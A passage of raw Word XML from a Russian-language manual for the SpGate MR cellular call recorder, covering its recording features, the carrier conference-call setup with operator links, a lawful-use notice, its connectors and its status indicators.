      <w:r w:rsidRPr="00433A6D">
        <w:t>запись телефонных</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>разговоров;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="413"/>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>регистрация даты, времени начала и длительности</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>разговора;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="413"/>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>определение входящего и исходящего номера</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>абонента;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="413"/>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>цифровое сжатие</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>аудиоданных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="413"/>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>регистрация пропущенных</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>вызовов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:right="261" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Для работы 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xml:space="preserve"> использует </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">режим конференции, поэтому необходимо убедиться, </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">что на </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">используемой </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">карте подключены услуги «Удержание вызова» и «Конференц-связь». Обратите внимание, что некоторые операторы взимают дополнительную плату за </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>оказание данной услуги. Чтобы убедиться, что услуга подключена корректно, можно попробовать организовать конференцию с  телефона.  Ниже  приведены  ссылки на описание подключения услуги для разных операторов</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>связи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00996DF3" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">МТС: </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidRPr="00996DF3">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.mts.ru/mob_connect/services/direction_calls/other_services/conference_call/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00996DF3" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Мегафон: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r w:rsidRPr="00996DF3">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://moscow.megafon.ru/services/base/service42.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00996DF3" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Билайн: </w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidRPr="00996DF3">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://moskva.beeline.ru/customers/products/mobile/services/details/konferents-svyaz/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TELE2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r w:rsidRPr="00B45DB0">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://spb.tele2.ru/services/udobnoe-obshenie/konferenc-svyaz/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00996DF3" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:spacing w:line="232" w:lineRule="auto"/>
        <w:ind w:right="18" w:firstLine="751"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Данное     изделие     может      применяться     только       в     соответствии  с </w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>действующим</w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:spacing w:val="67"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>местным</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="67"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>международным</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="67"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">законодательством. </w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">процессе </w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>работы осуществляется предупреждение о записи</w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00996DF3">
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>разговора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00996DF3" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_TOC_250015"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>Общий</w:t>
      </w:r>
      <w:r w:rsidRPr="00233B41">
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>вид</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Сотовый регистратор </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SpGate</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> М</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> представляет собой устройство в пластмассовом корпусе со следующими разъемами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>разъем</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>питания;</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t>разъем для установки</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>SIM-карты;</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t>разъем для установки SD карты</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>памяти;</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t>разъем для подключения внешней</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>антенны;</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t>разъем USB для подключения к</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>компьютеру.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251657728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>958215</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>308610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5624195" cy="2292350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="17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419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433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Общий вид регистратора схематично изображен на Рисунке</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:right="2597" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 2.1. Сотовый регистратор SpGate МR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_TOC_250014"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>Индикация</w:t>
      </w:r>
      <w:r w:rsidRPr="00233B41">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>состояния</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>На лицевой панели регистратора находятся светодиодные индикаторы:</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t>Power – индикатор наличия</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>питания;</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t>Net – индикатор уровня сигнала сотовой сети</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>GSM;</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lastRenderedPageBreak/>
        <w:t>Stat – индикатор подключения SD</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>карты;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1307"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Talk – индикатор состояния телефонной</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>линии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">На задней панели установлен светодиодный индикатор </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="65"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>карты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 3.1 Состояния индикаторов сотового регистратора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9913"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043"/>
        <w:gridCol w:w="3454"/>
        <w:gridCol w:w="4416"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
